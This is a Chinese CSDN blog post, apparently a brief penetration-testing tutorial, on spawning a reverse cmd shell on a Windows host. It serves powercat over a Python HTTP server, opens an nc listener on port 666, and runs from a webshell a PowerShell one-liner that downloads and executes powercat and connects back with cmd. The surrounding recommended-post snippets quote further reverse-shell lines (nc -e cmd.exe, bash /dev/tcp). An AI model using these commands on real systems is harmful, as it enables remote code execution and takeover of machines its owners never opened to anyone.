powershell反弹cmd

最新推荐文章于 2023-02-19 02:30:34 发布
最新推荐文章于 2023-02-19 02:30:34 发布
阅读量2.6k 收藏
点赞数
分类专栏: powercat反弹cmd 文章标签: php 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42307546/article/details/123859096
版权

下载地址 https://github.com/besimorhino/powercat

这个powercat可以放在服务器上供目标机器远程下载执行
首先在当前目录用python开启一个http服务

python3 -m http.server 8080

在这里插入图片描述
在kali上开启监听666端口
在这里插入图片描述

nc -lvvp 666

在webshell上执行命令

powershell IEX (New-Object
System.Net.Webclient).DownloadString(‘http://192.168.1.15:8080/powercat.ps1’);
powercat -c 192.168.1.15 -p 666 -e cmd

返回shell
在这里插入图片描述

qq_42307546
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反弹cmd
qq_41861225的博客
01-21 1158
**前言:**我们在学习的过程中经常会听见“反弹shell”一词,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。同理我们也可以自己实现一套反弹cmd的操作。 ...
反弹cmd命令
12-06
反弹cmd命令
cmd反弹shell提权
10-24
cmd反弹shell提权
PowerShell 反弹渗透技巧
weixin_30790841的博客
08-15 257
Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能,并且与现有的WSH保持向后兼容,因此它的脚本程序不仅能访问.NET CLR,也能使用现有的COM技术,同时也包含了数种系统管理工具、简易且一致的语法,提升管理者的管理能力,自Windows 7 开始一直到Windows 10 包括服务器Windo...
CreateProcess 重定向CMD实现反弹shell
hambaga的博客
03-01 428
这段代码比我还老了,哈哈~ 功能很简单,就是一直尝试向某个ip:port反弹shell,C2用nc就能接收这个反弹shell。 // RedirectCmd.cpp : Defines the entry point for the console application. // 还原《恶意代码分析实战》第九章练习样本2 #include "stdafx.h" #include <WinSock2.h> #include <Windows.h> #pragma comment(l
浅谈CMD和win powershell的区别
09-21
本文给大家简单描述了一下POWERSHELLCMD的区别,简单的说,Powershellcmd的超集,换句话说,cmd能做的事情,Powershell都能做,但是Powershell还能额外做许多cmd不能做的活。
Scripts:为 PowerShellcmd 编写的一些有用的脚本
05-29
在IT领域,脚本语言是自动化任务和管理系统的重要工具,特别是在Windows环境中,PowerShellcmd命令行接口扮演了核心角色。"Scripts:为 PowerShellcmd 编写的一些有用的脚本"这个主题,揭示了一个资源集合,...
PowerShell入门教程之PowerShellCmd命令行的关系?
01-09
这三个问题的答案足以让我们了解PowerShellCmd命令行之间的关系。让我们慢慢道来。。。 PowerShell中的CMD命令 启动PowerShell,在其中输入几个常用的Cmd命令 代码如下: PS D:\Projects\Practise\PowerShell> dir...
cmd执行powershell命令
12-05
之前发现一个比较好玩的代码,就是可以查询EventLog中的蓝屏是否存在,命令是找到了,但是我希望在CMD上运行,可百度提供了一些办法,但是方法过旧,便自己尝试一下,发现的一个好的方法
powershell::man_vampire_light_skin_tone: PowerShellcmd.exe 的深色主题
05-29
用于 PowerShell 控制台的 Dracula Windows 10 控制台的深色主题,支持和 。 git 集成只能通过 posh-git 在 powershell 中使用 安装 请查看我们的。 支持其他终端 该存储库还包含的以及的。 ConEmu 主题的替代版本...
网络安全-木马入侵windows -msfvenom反弹shell(CMD
weixin_48137911的博客
02-19 5791
需要做什么呢漏洞与木马的区别在于漏洞是某个系统某个框架,才能用特定的环境下才可以但是木马是全部机器都可以用因为木马相当于软件如果你电脑不能安装软件那你这个电脑也没啥用。
windows 反弹shell_windows版瑞士军刀powercat之牛刀小试
weixin_39963080的博客
12-12 238
时间过的太快,又到深夜了,又要开始刷抖音或网抑云了。今天一位同事因为晚上没有加班,去拿20块钱的夜宵,被举报了。这种在领导面前打小报告的人,职场里面非常多。同事之间要多堤防着,保不准哪一天其中有人会出卖你。这篇文章做了4个小实验:powercat 正向shell(windows-linux)powercat 反向shell(windows-linux)powercat 反向powershell(w...
python反弹shell_windows命令行反弹shell(一)
weixin_33463850的博客
01-29 1213
前言实战中会遇到各种AV,有时候无法直接反弹到msf或CS中。我们可以婉转一些,先反弹cmd里再想办法bypass。powershell反弹cmdpowercat是netcat的powershell版本,功能免杀性都要比netcat好用的多。被攻击端运行命令powershell IEX (New-Object System.Net.Webclient).DownloadString('https...
Windows下反弹shell的方式
ws1813004226的博客
05-25 5913
一、Windows下反弹shell 1.nc反弹 (1)我们先在被控制主机下载netcat。netcat下载 (2)cmd下打开下载目录,输入: nc 192.168.59.131 9999 -e C:\Users\21124\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cmd.exe(本机cmd文件路径) (3)可以看到shell是反弹回来的,但是可能由于防火墙的原因,控制极其不稳定。 2.msf反弹 (1)
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Windows篇(゚益゚メ) 渗透测试
寻觅的博客
04-07 3046
文章目录反弹shell介绍常用反弹方式NetCat(NC)反弹正向NC反向NCmshta.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Cobaltstrike利用模块hta攻击源码rundll32.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Rundll32加载htaRegsvr32.exe利用msiexec.exe利用powershell脚本绕过杀软混淆处理 反弹shell介绍 反弹shell主要就是让我们能远程连接到目标控制台并且下
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4637
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
Windows的几种常用反弹shell方法
热门推荐
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
powershell, cmd
最新发布
02-20
PowerShellCMD都是Windows操作系统中常用的命令行工具,用于执行各种系统管理任务和自动化脚本。 1. PowerShell: PowerShell是一种跨平台的任务自动化和配置管理框架,它结合了命令行界面(CLI)和脚本语言。PowerShell使用强大的命令语法和脚本编写能力,可以执行各种系统管理任务、管理操作系统、配置网络等。它支持对象管道,可以将命令的输出作为输入传递给其他命令,使得任务处理更加灵活和高效。 2. CMD(命令提示符): CMD是Windows操作系统中的命令行解释器,它提供了一系列的命令和工具,用于执行各种系统管理任务和操作。CMD使用简单的命令语法,可以执行文件操作、目录管理、网络配置等。CMD的命令集较为有限,功能相对较弱,但在一些简单的操作和脚本编写上仍然有一定的应用场景。 总结: PowerShellCMD更加强大和灵活,它提供了更多的命令和功能,支持更复杂的脚本编写和任务自动化。而CMD则更加简单直接,适合一些简单的操作和脚本需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值